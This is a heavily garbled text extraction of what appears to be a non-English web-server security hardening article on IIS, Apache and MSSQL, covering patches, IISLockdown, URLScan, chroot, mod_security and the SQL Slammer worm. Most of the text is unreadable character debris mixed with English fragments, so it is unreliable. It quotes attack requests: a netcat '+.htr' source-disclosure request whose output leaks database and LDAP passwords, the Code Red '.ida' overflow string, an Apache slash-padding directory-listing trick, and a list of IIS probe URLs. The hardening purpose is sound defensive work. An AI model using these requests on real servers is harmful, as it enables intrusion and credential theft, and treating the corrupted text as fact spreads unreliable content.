) , 5< ' 3 =GX - ?@ G0 , 6 1Q 2 0 < Y bB g ' < 7 G:H$5 ) 4IIS 3 " " ISAPI DLL <) ) N F < 6- _Source Disclosure]+ % ' ISAPI DLL % '.htr, 40 , , Y E - 2 " NetCat Ÿ 0 N GET/sitel/global.asa+.htr HTTP/1.0 [CLRF] [CLRF] 5< -,< H R4 S @ ) netcat B ) 9P " - Y a, -,6 f , c:\>nc -vv www.victim.com 80<htr.txt www.victim [10.0.0.10]80(http)open 200 OK HTTP/1.0 server:microsoft-IIS/5.0 date:thu,25 jan 2001 00:50:17 GMT <!--filename=global.asa-->("profiles_connectstring") "DNS=profile;UID=company_user;password=secret" ("DB_connectstring") ="DSN=db;UID=company_user;password=secret" ="DSN=phf;UID=sa;pwd=" ("PHFconectstring") ("sitesearchconnectionstring")="DSN=sitesearch;UID=company_user;pas sword=simple" ("connectionstring")="DSN=company;UID=company_user;password=gu essme" ("email_pwd")="sendaemon" ="LDAP://DIRECTORY.COMPANY.COM:389" ("ldapserver") ("LDAPUSERLD")="CN=DIRECTORY ADMIN" ("LDAPPWD")="SLAPDME" ? $GLOPA.ASA% ' , T 5G 7 5<0 -,< S# ) -, & ,1 7 5B " 6P< , ,< F ISAPI DLL R4 S @ " N 4) 0 < T/0, 3 @ 56- - Y & , 3 6ISAPI DLL ,< ) ) 7 !89 7 ;! F) B , 2 560 < ;! @ MR / 0, MR / ), B !$ - 'X ? GF' B 6 E ) ? DLL 6-, <N MR/ 7 +.HTR + " -,6 Ÿ = B* A) 2 , 6 3 ;. %LY j 5 7 !89 , ‚ ISAPI : 56 +.HTR ? )&' 0 < 5 - -,< ?@ ? j 5 ;! ?@ 1P H GLOBAL.ASA % ' -,6 6 * ') PRINTER ' @ MR / (,! ) , < TG' g 5 6 D l '-, ,! 78# , < ^ I'/ IIS ) < <N DLL @ F 0, - 56DLL I'. @ ) 6% ' 6 4 B' < 15 / 785/ " :A ISAPI DLL+ A $@ CVA6 A &2S AA @ A <: $8S& IIS: + $A 8 # $ h6N 0 :;d > 3 b ; #d >> @ MN( d28 << 8 : 2 ) <N ; ! , 6% ', B$, a, , -,6 T G' g COMPUTER ) $, < ?@ 5< " 6DLL ? 4h U $, DLL PROPERTIES U O* ) •MASTER PROPERTIES •WWW SERVICE •EDIT •PROPERTIES OF THE DEFAULT WEB SITE •HOME DIRECTORY •APPLICATION SETTING •CONFIGURATION •APP MAPPINGS ?@ ) PRINTER , 4 B' MSW3PRT.DLL % '$ %#<0, N <N 6ISAPI DLL @ F) ISS N56 6DLL - 56 @" MR/ < " &2 <N R4 S @ >G " T),F , < 0 & &H " %# < , - P 1 ^ ? < + ! 
" ACTIVE SERVER .ASP BUFFER PAGES OVERFLOWS,MS02- FUNCTIONALITY 018 WEB-BASED .HTR +.HTR PASSWORD RESET SOURCE DISCLOSURE,MS01004 INTERNET .IDC 6 DATABASE ? # <@ Q193689$O) CONNECTOR SERVER-SIDE .STM,SHTM,SHTM1 ' INCLUDE & MS01-044$ ) INTERNET .PRINTER - ' PRINTER & MS01-023 ) INDEX SERVER .IDA,IDQ - ' & MS01-033$ ) FRONTPAGE UNINSTALL FPSE SERVER EXTENSION REMOTE RAD SUPPORT MS01- IUSR ' & RAD 035 SUPPORT ' ) # HOTFIX )PATCH ISAPI DLL +' , & N =B* <N 6 6 g8 0 F) MS01-026, - - R4 S @ 1 ),< 6PATCH " , -,Y -, @ 6-, 5< # @ 78# ISAPI DLL , -, < , ) SL B ) 6% 4 MR/ ISAPI DLL 78# P 9 6S % B 5F " 0 F) 78# N +' ' ) # ‹ R4 S @ () , 7 B) @] 4 ,N - %/ N < ') # A & microsoft security bulletine 5< 6 g8 2 " ( , 6 _, < 0, ,4 ' ) # $, ,F 6PATCH 0 - pqqwT R4 S @ ?@ ") _HFNETCHK.EXE] Š j 4 HFNETCHK # " % P H P 10, 6 -, < - A & ' ) # - 6? , 6 ?# 0, K5 SL ' ) # b -,< ( E -, < K 6 < " (N " ") 0,6 (E$ - ' ("c$ - Y IIS - 5 PHP P ), 6 " # GF F l '7c L. ? @ ) - @ T L. ) UPDAE WINDOWS 6U ) (N $ ' ) # 6 -, < 'X 7c L. g] -,< 'X 7c L. 2 ), \) < -, < 'X 6 ) HOTFIX i: 3 7 !89 , # j 4 -, < K PATCH 2 3@ : 5 HFNETCHK 6 XML B X ! P 1 #P< HOTFIX -, K ) PER1IIS,COULDDUSION I " 1 6 #P< " 6PATCH 2 3@ - - N4" PATCH , I 5< IIS ) ) SERVICE PACK A & ) , b g8 2 p• -, 6 ? 6PATCH % <$ bP ) ("c ? , IIS ("c ) - P ' ) # 0, 6 ( E C IIS 3 _ ') # URLSCAN,IISLOCHDOWN " - Y ISSLOCKDOWN WIZARD ( , #4 0,< )“CUSTOM’ 3 & 1/ IISS L d* 6 '$ IIS SL a T G' g 0 ISS $ l ' ^ P 6U ) 5< -, 6 U ) & d* F 3 : ' ) # $pqqw T j $ ?@ I 7 "7 B, 6 " 3) : 56) % 4 IIS “EXPERT“ u? u T5! ?# $ S -" Fa 2, 0 5 ) • P 1_NNTP,SMTP,FTP,WWW], 5 network hotfix checker 5< I - 5 -, < K b C 5! 6 5 MR/ )_,< T) , 5 7 < " $O) . 6 ISAPI • ?@ F) + 2 `56) IIS Z F " O) -, 6 U ) 0_TFTP.EXE )CMD.EXE I ] g % N ]WEBDAV ? 5 T G' ga 'X b. # EXTENSIONS ? - Y ?5F gaSCRIPT 5 T G' MAPS• _PRINTER)ISM)IDQ)HTRa I ] @ 2' R ) IIS CP - -, < - 1 c 6 ' B H" % 6 3 5 ‚, >G P 10, < ? 5 % ! N 5 E 6 PF - ) 4 3 7 L* " IIS W L* #4 #B 5! ) O) -, 6 U ) ) % 9 ? 
B F 5 ) ,< - & aURLSCAN• B' ˆ 6 6hotfix) SERVICE PACKS L - , # $, , 6 " @ ˆ6 ) IISLOCKDOWN0, & 6 PF " ) S L ) " " , 2 ,F 7 # ?@ 6& ? " URLSCAN$ -, 5 (E , "), ) IISLOCKDOWN #4 3 IISLOCKDOWN0 0,< %'g N @" @ I'. ˆ 62 `56$, 6 ) L* ) X ? 5 B3 URLSCAN L , P 1 5<0 < SL _IISLOCK.EXE] IISLOCKDOWN a, 6 ( E C:\>IISLOCK.EXE/Q/C/T:C:\LOCKDOWN_FILES IISLOCKDOWN n 9 " URLSCAN SL ,< N A) 0 < SL , , , ' -, ISAPI 3 5L ) ,< 37 URLSCAN.INI)URLSCAN.DLL % ') % < URLSCAN ,< ,< P 1 B' URLSCAN.DLL0 IIS # " % PH ) , , % 5! % K/ H$SL , ?56 H IIS B F ) # 4 % ' URLSCAN.INI ) , % B . ' R4 URLSCAN ISAPI b , PHTTP 3 @, \ $, % ' P 1]0 < - 3•SL URLSCAN.LOG ( ?56 3•URLSCAN.MMDDYY.LOG( - 2 #5 A & HTTP 404 OBJECT NOT v 4 , HTTP 4 P [ FOUND ' 5 URLSCAN , # 4 3 6 URLSCAN_ < 3 0, " % ' ? a 'R ,< _- g ) HEAD)POST)GET, 7 5B ] -,< , 5 H2 3 3 , , 6 3 ,G ;/P ] V # <) h … 4h … 6URL h … B', -,< & _,< 6URL NON-ASCII 6 " 3 : X nP9 , 6 >/ h … 3S >/ h … 6, @ >/ h … W L* F) d * 6 4 2 " (, 6 0, < <R URLLSCAN.INI % ' 6) < & IIS ?,< F ? " , 0 < " , - - ) IIS < b' URLSCAN.INIa # T5! " b'?@ #P< 6" , 7 " B') , - B) N " ?) 5 ? , 4 bB 4 2 ,@ #6 , ) F ? T/0, ) F) 3 -, B' ? ,63 B $ H 5 2 ) 0, • !" " #$ % - 0 H % PH " TCP SYS & 4 % 7 ) ) z 3 % j @ N$, 5 )$ < * +! - 4 & 21 ) H @ &F b' ' (! " ) 5 0% F O) ) ?@ - B' 26• c 5G 6 F) 3 %3 " 7 9P -, u (E ^P #P< 6 3 6 , < 5 V B, @ ], < %3 \) < 6 ?) 3 , * 4 , E 2 ?# 2 P 1 ) ) _€ Y + H) P[ ) V , -, •Y ? )" H)$ )0 \X & 2 ?, 5 ' B IDA/IDQ ISAPI 6, 4 ) 6-, <N NIMDA)CODE RED ( 2 0, % ) ) pqqw T + H) P [ % ', , " 3) - 1 @ " ), ' ) # " B 5/ ' & f 2 , ,F , 1 ;! ? < 3 6h) ) , 56 & 2 " R4 S @ . CODE RED ( P < B 3, <) " N ISAPI DLL TP $,< -, 6) , " pqqp -,< - 1 @‘ ‘ 6) GET/DEFAULT .IDA?NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNN%0U6858%0UBD3%0U4570%0U7801%0UU9090%0 U6858%0UCBD3%0U78%0U455%0U00000%0U00=A7 0, E - 1 @ \X %SYSTEM%\NOTWORM 2 -, 6 ? - 1 @ CODE RED ( 2 `560, < ,4 u( 2 ,< 7# 2 N4 @V# 3 < 0, 6, 9 2 -, 6 ? 
$ - + H) P [ 6% ' 5I 7 0, < ; +!0x90 0x90 %u9090 # : ,< % ' ROOT.EXE % ' >/ - 1 @ 6% '2 `56), 560, >/ TQ ? ! X /T / "), ) % < 7 NIMDA( ,< ) % ' ,G 2 `56NIMDA)CODE RED 6 - ./0 ( 7 , ) H? , " , 8 + 5 5< , +1 2 " 34 5 6 nop " @A x86 = U4 4 78 > ? 8 6- "( 7 < -source code #' , < , :B g e '2 0 N , 6U a " SQL 7 , ‚, < " 5 5 <+ % 5< 6:3 2 B) - -N4 '%# IIS 6, ?, 5! " ^P 1#< 2 4 .INC @? 0 !89$% 5 h @ , T5! ,< 6, ( ? 4 ) j 4 I 7 R4 S @ ? 2 " %P H U 40 , < - @ , R4 S @ ) , < - 85/ 2 & 7 5B… INCLUDE B'" - Y … # . # ) ?) 0, 0 6 3 ;. %LY <) 2 9 " R4 S @ ^ @ +' F 6N 4 , )- ,4 N - # 3 ,G ;/P HTTP GET R4 S @ OK(/DEFAULT.ASP /DEFAULT.ASP+.HTR +.HTR SOURCE DISCLOSURE ERROR PERFORMING MS01-004 /FILE.STM,.SHTM,.SHTM1 WEB QUERY 500 j 4 2 ? N SOURCE MUST BE PRESENT 500 # , < R4 S @ v 4 j 4% H 200 I'. 3$, 6 ( E 5< B ! ( ,H - 3 #P< I 7 ?@ " ?5F ? 7 .X … ?5 3 , " # 7 L u2 & N Y* 7 !89 6 <… < ASP 00 ) & 7 5B$ , S# 2<) ) iX ) ? GLOBAL.ASA % ' 2<) ) .ASP, `@ H U ˆ6, >G , 0, < ) d* INTERNAL ERROR;HTML ERROR IN WEB SERVER DIRECTORY PATH DISCLOSURE ,Q193689 /NULL .PRINTER .PRINTER CONTAINS BUFFER OVERFLOW ,MS01-023 PRINTER INSTALL 200 OK;HTML CONTAINS /NULL.IDA,IDP INDEX SERVER BUFFER THE IDQ FILE..COULD NOT OVERFLOW,MS01-033 BE FOUNS 200 OK;HTML THE CONTAINS FORMAT /NULL.HTW WEBHITS OF SOURCE DISCLOSURE>MS00-006 QUERY_STRING IS INVALID 200 OK (/FILE .STM MUST BE /FILE.STM ,.SHTM,.SHTM1 SERVER PRESENT) 501 NOT IMPLEMENTED SIDE INCLUDES BUFFER OVERFLOW /_VTI_BIN/_VTI_AUT/FP30REG.DLL FRONTPAGE SERVER EXTENSION BUFFER OVERFLOW,MS01-035 a+ 1-HACKING EXPOSED –WEB APPLICATION ,JOEN SCAMBRAY,MIKE SHEMA 2-WEB HACKING –ATTACKS DEFENSE,STUART MCCLURE ,SAUMIL SHAH,SHREERAJ SHAH 3-WWW.SRCO.IR a , , < +H ) B 5/ 6 ˆ60, -,< F 2 ) ') G O) R4 S @ " 5< (E ) 6 ) ?@ n 9 " @ ) 6 2#5 N ,< " 7, , 5 $,< 62 ) #. ) 2 2 `560 < & 21 ) , LH E ) 6) B3 0 ) $ 6$ O) () R4 S @ ) < ;. NETSCAPE) IIS)APACHE? `56 R4 S @ -, 4 2 , N N %B . ) DOS1 785/ 6 ) 'G U ) 6, H @ 15G ) 5! 
0 " 0 785/ 1 , N –denial of service B3 X / T / , G1: $, < , Y -8 j * 2 5< 56 ‚, < ,< 6 N, ) ') ) - )M 6 #< TP BPH " 3 , B3 , / ? ) " # TH APACHE 0 ) 5 O) ? , 6 U ) 78# 4 $_IIS] ) %K 0 CA-2002-17,CA-2002-] =GX - 0 6 ' " 7, , - R4 S @ ? `56) < R4 S @ ^ bP ! ) h / 6- _ ?@ l '? # 4@0, < -)8!0 4@ -, 6 U ) - Y "), ) I =B* R4 S @ ^ B! ? 5 TG' g• , ] -, 6 U • 4@ 6* ? '- 9* H U# 1) U# N & )j 5• • # " R4 ) - " -, 6 U ) 4@ Z F PL $ U 6 ) 6% '2 3 , - 9* 3) -)8! 6 „ 1 # $_27 _DOS] U ) e 'j 4 7 F) & O) -, 6 U ) "$ ?@ 6* & ) 6 " 5 " ,G ) ? 4@$ " \ 2 0 5 SL & , 5 0,< 7 3 O) 7 .Y - H , ) H8! h ?8' 6 , <R 2 3 F S1H ) , 9 , ?@ APACHE 1 )„ ,< - *1 " APACHE 1 )„ 2 56) Pc 3W 3 e ' ) #17 E E 3 - *1 ORF 3 .Y ?8' ) , -,6 4@ O) -, 6 U ) & PHP)CGI R4 S @ ^ F) 7 a ') # 3W 3 # _APACHE] " 4@ , ) 6T)„ 3W 3 S @^ 2 1 ), T25& , ! X I 2 ) 7 .Y 0, , 3 , -,6 7 .Y j 5 ) / 9 y , , 6, -" F , P 4 \ X 2 # 0 ,6 H :3 e G 0 ) 6 5 ) TQ c 9 6SLASH B ) ) MOD_DIR,MOD_NEGOTIATE 1 )„ ? " ? 1 6URL 5F c 9 MOD_AUTOINDEX ? 56 . APACHE R4 S @ 2 0 ,6 j 5 2001 h APACHE 1.3.19 * A8 ) 8 1P 5 1) B " URL 0 B3 j Y0 " B " ,4 P B g O) ) - 4 GH ) , G0, 6 j 5 ?@ B ) # 5 APACHE 6 ) , 2 0, A" 1 2< ? < Y, E #0 & URL :&i2L + $0@ , #4 B) %# 1 )„ 0 ) e 'j )$, . ' H ) , APACHE '& F) 2 %/ (, 6 ) APACHE # ) $,< , 4 B1 ˆ 60 -, @ " H APACHE ) 1 )„ 2 0, MR / # 0,6j 5 0 B 2 MOD_DIR)MOD_AUTOINDEX 47 1, , Q 0,< +' APACHE 1.3.19 2 <+ 2#5 1) ,< 8000 " 4 ? ? ! $ B B3 PERL B 5/ 2 - " ? 5$ /CGI-BIN///////////////////////////////////////////////////S 7) Y ;! MARTIN KREAMER - '4j 4)- " ,G < 93 @ APACHE ? % , 6, j 5 ? " 3 O) ) , - Y , 1 )„ N MR/ ) 1 [ROHAN APACHE]$./CONFIGURE –DISABLE-MODULE=DIRDISABLE-MODULE=AUTOINDEX APACHE 2 , 60 # ', 6 3 B H" 6 Y 0, Y1* $ , ? ? ) B) - " 1Q 2 P10 3 <8 6 6 BH 2 , ,F ,< 1 2001 c F n 9 , $ APACHE 0 1 " ,< 6 3 P . ,Y (5 [ \X 1 ,6 * -,< e ! '? B , 1NETCAT 6 PASSWORD % '? 
56c / " ) F 3 B 5/ 2 0,< A & BUGTRAQ 0, < -, @ # 2 O) , " KEVINb , a,6 j 5 B APACHE)MULTIVIEWS R4 S @ ) ) X ,4 BRASSCONNON.NET " ,< 4 , -" F ?), APACHE0 $ ) " MOD-DIRT)„ MR / 2 F) 3 P 1 ,< 6) 6 \ 2 B' R4 S @ 2 0,< 0,6 MULTIVIEW ' ? B - , P - ) X g B'0, - N`6 , P$, < V4 ?) 2 O) ? , 6 G 5 # " H) 6 2 \' 21 ) 0 < - 3• B' 6)$ ? 1 0,< ?P 4 * $ 5 ,H R 4 S @0,< < F) @ ?) 6 % H 6 ) B) , ,, h / 6- MOD_AUTH_*SQL j P( <) STUTTGART- N ?) _¤] 7 , 2 P 10, < 0 iX SQL -" F ? " RUS-CERT,2001 1 )„ 4 2 56) < 6" / ?@ 2 0 - 6 3 ;. %LY @ 6" / N N R N F O) , " 9 -, @ 3 \X MOD_AUTH_*SQL • ("c P 10, ") 0, , APACHE , R4 S @ d * - . W L3 a - Y ! ". /0(123& ("c 7 !89 S ) 6h @ " ? $ " 6 @ I5 4@ O) -, 6 APACHE 1.3.X h @" ? 1 2 " U4 +$ U) @ MOD_AUTH_*SQL - Y ", - - ) SQL P< • : HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-13 h @" ? APACHE 2.0.X HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-20 ) R4 S @ d * " - Y 0, <P 0 ,Y - . I 5 ("c '7 !89 G X) Z W K a 6h @ ("c 7 4 & HTTP://HTTPD.APACHE.ORG/a h @ "2 APACHE O) -, 6 U ) 0 L3 $-,< - < "7 K 4$ "7 " 4@ O) -, 6 U ) 4$ DY/ B <) DY/ I 5 4@ O) 2 3@ SL " ? 59…w HTTP://HTTPD.APACHE.ORG/h @ " ? 5 - Y levels PATCH) 6 * h @" ? 4@ : GX) 2 3@ " 2 6@ Q CODE SOURCE 6* … I5 I … 0 5 - Y HTTP://WWW.APACHE.ORG/DIST/HTTPD/PATCHES/ ? @ " +F ? ! . I 4@ % ! ) X - < R4 S @ ^ 1 )„ C' # 2 " $ . - "2 % 5 0, 5 6-" $ -, 6 U ) O F$ 4 0 ? G “/“ - Y G', % ' 5 -,6 6 c H, ), . $ l ' ( : ?@ ), . -)8!0 0, @ # 0 5 ?@ '# ,6 * 6U ) H CHROOT/HTTPD| 0 LOGIN SESSION " 5 ) ?# $, 5 " g@ 3 6- Y Z 6- Y # 6 ' ) -, < -, F W L3 $l ' 3 6j* G', c 2#5 $ ) -,< -, 3 'SHELL ", 8Q0, C L 3 'SHELL 15 / - Y Z E /CHROOT 1G') Z F CHROOTED 7 S 2#5 $ $ , 6 F W L3 4@ F) CHROOT " z 3 ) % ! 15 / F 3 < 4@ -, 6 U ) F CHROOT b . 8Q0 C ) F & 7 I ) G ; ! CHROOT CHROOT0 5< l '-) B 4$ CHROOT…‹ ,E = ,4 2 W 3 ^ P> F ) ROOT ? G, F " …s E " E %H ,/ W 3 6) - ),. ,E = G ;! ) #B 5! 4@ 0 < ,6 * / 0 - Y - 5 - Y _CA-2002-23] OPENSSL ) , ) X 4@ 2 5 MOD_SSL(CA-2002-27) ( % I 2, F ("c : ("c0, 0 ) !PATCHING " ? 
59…p ,B F S 4@ 2, 0 < ,6 * 5 ? G0 5 ? G0 H CHROOT E E 15 / /BIN/SKY 4@ CHROOTING ) !89 , " ?@ I5 <& $ CGI,PHP 6 6U) ,G +P - ^ P 6 A) 0,< < TP, &'( 7, 3 ?@ # P ) "E 6 ,' 1G'\ 6% 6 •c 4) 6 S , ?# $ S !89 , ) BH$ @ R3 4@ -, 6 U ) 0 '#< ) [ 6 '$ -, 6 U ) < $ , 5 ' K LOGGING 0, 5 (E 2, 0 < I 5 …Š ) -, 6 U ) ("c 2 40 6% ' + K W L3 ?# " W 3 I ) 1 )„ F) CHROOTING < B K LOGGING 7 B 5! g * ("c 7 , 5 ? @ &1 R 4 M :G H 9P ("c$ O) -, 6 U ) 2#5 F %K W L3 I 6 #6 -, 6 U ) W L3 c ("c P F7 [ , b. F 3 - Y $ 9 1G'W L3 ("c 0, 5 B : I 5 O) -, 6 U ) ? G$ I ) # 2 : 6% ' 7 L g ' ) F 7 !89 a,< ,6 3 6 '? @ a 5 - Y "+ " , •c 7) Y h @ " APACHE 6 ' ) <@ I5 1.3.X … < HTTP://HTTPD.APACHE.ORG/DOCS/LOGS.HTML APACHE HTTP://HTTPD.APACHE.ORG/DOCS2.0/LOGS.HTML2.0.X - Y 0 < •c P ) F 6% ' . 2#5 -, @ j 4 ^ < ) CGI,PHP " 6 „ 1# &1@ ? j &' I 5 ? •c0 5 POST,GET ^ MOD_SECURITY n 9 " , 6•c F # ) ) )Y l ' GX)0,<P ' ,, $ - Y # P [ ( ,H $ =GX " - Y Z POST ) GET bP 7 B 5! ? 5 0 R4 7 _DETECTIOMN INTRUDER] 2 5/& d * l' 0, 5 N 4 K F O) S W L3 j< 4 " $MODSECURITY0, 5 U) MODSECURITY ) ("c 6 < 6 'O) N 4 ) ,< O) -, 6 U ) 6 ^P - 56 F 0, 5 5/ " 4@ -, 6 -HTTP://WWW.MODSECURITY.ORG/ •-HTTP://WWW.SECURITYFOCUS/17064.152.44.126%20152.44.12 6 ) SSI,CGI,PHP…• # a ,F ) X # N ], K5 TG' g 4 # I ,! T G' g 2 < F) ? @ : SERVER SIDE INCLUDES ", 3 : ) SSI,CGI,PHP… 6? " _,< Z " 6, F ;! ) , 6 '-, 6 U ) SSI… " - Y 0, K5 ) SSI,CGI,PHP " # 6? " # F ? # $SUEXEC0 < - Y SUEXEC " 6 ' APACHE USER ID H ^ , 5 6 ' USER ID , 6 3 MR /$ ? 5F 7 7, , S b , < ("c j SETUPID ROOT , 4@ . . CGI)SSI L 3 CGI)SSI ) 6 @ 3 <) S SUEXEC " - Y ) / 0, 5 6 F 3 ' 6 F) , # 4 (,! #B 5! - . ) 6- Y/ ") <@ - Y ;! I ) : a 5 - Y a < - Y 6 SUEXEC " -,Y 0, < ( 0,< ,6 3 N h @" ? - Y 2 , 0, < O ) -, 6 U ) -, < < P - 5 ?# 2 SUEXEC 4@ ? … $ USER ID % P 7) Y USER ID 2 < ? # ) j6 ) X # " h @ " APACHE 1.3.X 3 2 " 6 … HTTP://HTTPD.APACHE.ORG/DOCS/SUEXEC.HTML a < " h @ " APACHE 2.0.X - Y … HTTP://HTTPD.APACHE.ORG/DOCS-2.0/SUEXEC.HTML ) CGI-BIN % < , MR/$ 5 e 'j 4 6 . 
W L3 # 5 ("c … ("c ) ( E 6 # PHP " ) - z 3 1 2 B / " S1: a 0 HTTP HEADER F - < W L3 2 7 !89 K ;! SAFE 1/ h @ " ? W l '\ X L3 2 23 5 ) K6 PHP 25 4 C ' 4 ? 5 TG' g… F " ? 59 T L/… B5# 7 !89 ' HTTP://WWW.SECURITYFOCUS.COM/PRINTABLE/INFOCUS/1706 T)„ 8Q 0 G X) XSS:CROSS SITE " ? W L3 2 P % I 'X ) … MOD_SECURITY DY/ ; ! , B5# 7 !89 -,6 1 )„ " - Y 0 < SCRIPTING <@ 0 5 - Y HTTP://MODSECURITY.ORG/ h @ SQL INJECTION &XSS % < R 4 S @ ^ ( 0 5 - Y h @ 2 P h ,G 6 6 & " ? : ) &5 … 0 56 &K/ & H]NIKTO & % " 2 # ' # _HTTP://WWW.CIRT.NET/CODE/NIKTO.SHTML 0 CGI ) j 4 6& R Y 9f
)j 4 ("c 5 - Y % H l ' & 0, 5 ' & * I 2 3@ 0, -,< K Patch 2 3@ ) b 6 K XP < " # - Y IIS - 56 PHP ("c 0 5 SL IIS -, < 'X 6 : Patch % < $ ' ) # ' ) # (N K http://www.microsft.com/technet/security/tools.hfnetchk.asp ) Perliis, CouldDusion " ' ! "), ) ) pqqq "), ) NT 4.0 "), ) ) 0 6Patch Checker Network Security Hotfix (HFNetchk) ? , F 456 123& 5 ( N $-, < K - Y F # O B : -18 9 Patch # 7"! & 1 ) Patching 0 -, < S L -, 6 U ) ) ) ( N6 K6A) " ! " %& IIS DY/ 6 $ #P< ? , 0, @ %5G - Y IIS " - Y i: Z IIS ,< -, < ( E -,< K 6 < " (N P ) GF l '7c L. 6 F 6U ) ) Windows -, < 'X 7c L. g] -,< 'X 7c L. " ( N6 bP ? , 0, 6 ( E - (#=% ! & 2> Lockdown IIS :; < & ? @ ) ("c 6 ("c ) - P 3 15 IIS IIS &) IIS SL K h @" ? 0 5 F 25 I * 0 - & < ') # Lockdown -, . com/technet/security/tools/locktool.asphttp://www.microsoft ' 3 I SL " 7 : Expert u? "7 u?# S ) Custom 1/ l' F IIS SL 2, 0 5 d * ^P 6 'IIS a ?@ F) 5< I N ] WebDAV ? 5 TG' g • b. # _,< Printer, ism. a I ] ) X g < " $O) . 6ISAPI extensions ? 5 TG' g • _Idq, htr IIS - 56 -,< K b C 5! T) , 5 7 - 3 ) Code Blue HTTP 0, < 6, " ? URLScan ? @ A" 4 " % PH K6 ) cmd.exe 27 ? 2 & @ 2> I IIS R4 S @ ^ 6 3 I] 1 ) K LLS Lockdown. . 15 bP 785/ " 7 L * 2 ` A R4 (,! ;! &) - 5 l ' " ,G 6, " Code Red 85/] , 5 5 - Y , #4 0, < -, 6 U ) http://www.microsoft ah @ " 0 - Y ?5F URLSean B'0_Buffer Ovrflow \ " 3 + • Z&F " O) -, 6 U ) 0_tftp.
-HTTP + , 5 MR/ • 6 N b ?@ ? ' & com/technet/security/tools/locktool.asp R4 S @ : 2 ) Microsoft SQL Server (MSSQL) _MSSQL] ' ) # , F R 4 S @ : 2, - 9 *5 ) !89 3 0, 5 7 . 6 ' ? 5F 2#5 & -, 6 U ) 3 M, 6 F / 7 !89 i. R4 S @ ^ -, < = ' ?# SQL ? , 6 U ) b ? & MSSQL ( 5! W 3 F - Y u $h SQL -, 6 U ) , 7 / 23 , # 4 (, ! % 1 , )W 3 0, HS @), , e 6=GX " ! ?@)- G ?5F SQL- Slammer/ Spida Hell/ Sapphire ) SQLSnake/ Spida ( ) 0, 5 ) - Y MSSQL -, < 3 < =GX ^ 3 ?1 ( E l ' R4 S @ : 2' , F F E F) Tu<] , 6( : - " _pqqs ) pqqp T ] - 785/ 6 1 @A I 0_T " -,< TG'] SQLSnade/ Spida ( b. , 6h @ ) + : , - 1 @ ? & 0, 6 #P < ' $ R4 S @ ' a 5 - Y aMay 2002] l ' 6( j &' Kc ,/ B5# 7 !89 ? " 7, 6 4" " ? K c $l ' B5# 7 !89 • http: //isc. Incidents. Org/ ang lysis. Html? Id= 157 • http: //www.eeye. com/ html/ Research/ Advisories/ AL20020522. Html. • http: //www.cert. org/ incident- notes/IN-2002-04. Html. T G'] SQL-Slammer/SQL-Hell/Sapphire ( : B5# 7 !89 aJanuary 2003 v • http: //isc. Incidents. Org/ analysis. Html? =157 • http: //www.nextgenss. com/ advisories/ mssql-udp. Txt • http: //www.eeye. AL20030125. Html com/ html/ Research/flash/ -,< • http: //www.cert. org/advisories/ CA-2003-04. Html ) wxss 4 Internet Storm Center b 67 K67 4 B 5F " _MSSQL -, 6 U ) ,< 0 , #4 " ? 59 T L/ 0, 2 0 I5 F DY/ , ( , H ? @ ? 5 T G' g sa Account " ? 6 " ) h, / - P 6) ( E : " %# T 0, 5 " # 6 2< ) U) ) 6 $l '( % N 4$ gatway \ ' A) 2 # N 7 UDP ^ 0_-,< - < 7 4 ' L /] , < %# H wxsx 7 bP #4 4y !89 F 3 H, , e G ) I Z F MSDE ? @ ) \X !89 ? ,6 Patching 6j 4 7 L z) 3 ) ) ) -" F] _ SQL -, 6 U ) 6 F SQL bP MSDE 2000, Microsoft Server 2000 Deskrop Engine ,G 0 ' !89 1 @),, e G ("c 7 ,H 5 B') 6 #B 5! 5 l ' GH ) h 0 ' ,6 3 , -, < K 7 , 3& @,, 0 [ I5 ) -,< N wxsx 7 4 5 0, 5 ' Resolution Service Overflow Stack Buffer \ 2 ), < ? SQL Slammer ( 2 6 & 3 account ?@ " h "?& R4 S @ ,L K6U ) I SF l 'Buffer Overflow 0 ( ,H ( " : Sa Account 0 5 P !& Buffer Overflow _% 5/] A bP B5# 7 !89 - . _0 < 5 - Y SQL/MSDE Z F SQL Server .. 
0 < 5 - Y I -, ` 4 P !& account ^ K7 L #B 5! - . Null _,< - Y Chang the SQL Sevr Admininistror Login h @ ?@ d * b SQLSnake ( N , ) 67 4] wxsx 25F , account ("c : " # e 'j 4 H _ '#< - N] sa account] e 'j 4 0 -, < K A & h #P < 6 #B 5! "] SQL Lite Server ? G ? 2 P / ?P / " " -, < S L Server SQL " * ) 6 @, < ) 7c L. - 56 Z&F " ? @) # ? G MSDE 2000 0, , P a • *< SL " SQL/ MSDE Server 2000 (Developer, Sradard and Enterprise Editions) • Visral Studio. NET (Architect, Developer and professional Editions) • ASP. NET Web Matrix Tool • Office XP • Access 2002 • Visral Fox Pro 7.0/8.0 0, 5 , -Y , 6 3 SQL/MSDE -, 6 U ) #40 = B* 6A) " - Y 8Q 0 < C A " - Y $? , H? , _TCP 7 0_ F) & -, < - < wxsx 7 wxss 7 4 / 9 -, - 0, TL 4 $pqqq MSDE F UDP &1 # ?), # Overflow Buffer ^ 4 U) 60 ? , d* ") GX) $, < , 6 3 ( E UDP h 6 ;! $,< )- %L ?@ UDP U) ^ 0 $-, 6 U ) -, < ? , X02 0, < " * A) " I ' ,6 3A wxsx 7 4 ) !89 K6 $ ( 4 #4 NAMED PIPES ) l '7 4 0 3 l ' , 6" - Y ? # ] , ? ! l '7 6 L ? ? , #) ) TL - . T !89 $ ( E 4" - Y pqqqMSDE !89 56MSDE ) SQL -, 6 U ) y 6567 # b & ?@ N? 4] Session NetBIOS 4 xxr|ws{ 7 ^ ,K U) # R4 S @ ^ ( E U) TCP U) 6? G MSDE " l ' 6 &'( !89 !89 3 : F) -, 6 U ) \ 2 " 785/ 6, " # ?@ F pqqqMSDE ' 6-" Z F System Local ,L account ^ , 4 # " I ' ] 0,< ,6 3 ) User Domain $ F 6- Y/ " & @ 0,6 ,L Overflow Buffer ) - Y ,L , , j6 F ("c 5 $ nH Critical Update a I ! ' R4 S @ 7 K &F &1 @ ) K <@ ' - Y _, H , , ) - 9* e G 6& " - Y ) ' 0 5 ( N6 [ 0 5 - Y Incidents.org h @ " ? - Y $, 5 ? @- 6% '7 "), ) Microfoft SQL /MSDE Desktop Engine " ,F 7 0,< ,6 3 N : ) 8 ( 6& " h @n ^ +, 6* " 6 6) , < -, < SL 2000 &'( HS @),, 2 e G 2 l' ) pqqq SQL/MSDE Server7.0 $, 5 + K K Kit Microsoft SQL 